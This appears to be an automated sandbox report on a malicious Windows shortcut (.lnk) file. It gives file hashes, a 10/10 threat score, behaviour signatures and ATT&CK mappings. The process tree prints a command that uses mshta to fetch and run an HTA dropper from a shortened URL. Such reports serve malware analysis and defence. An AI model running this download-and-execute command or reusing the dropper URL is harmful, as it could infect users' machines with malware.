Analysis

  • max time kernel
    138s
  • max time network
    186s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 13:59

General

  • Target

    d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805.lnk

  • Size

    1.2MB

  • MD5

    365d95c0d0659a1081488460eadf8159

  • SHA1

    63a3f87be4f037585f576599823557e5444084a4

  • SHA256

    d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805

  • SHA512

    41c49560683ee1611eb1143ca6babe650e336c33f7d58b67cb34e17e0450a9ef6b212fc318bc3601942e49acc3ba65aba86278bb6a60ac0764b9488036a4ca4a

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://bit.ly/3eIxLAZ

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\d287388e5ff978bf6f8af477460a9b76a74fdc33535e392b70e58176fc9ad805.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://bit.ly/3eIxLAZ
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4104
      • C:\Windows\System32\mshta.exe
        C:\Windows\System32\mshta https://bit.ly/3eIxLAZ
        3⤵
        • Blocklisted process makes network request
        PID:3108

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3108-131-0x0000000000000000-mapping.dmp
  • memory/4104-130-0x0000000000000000-mapping.dmp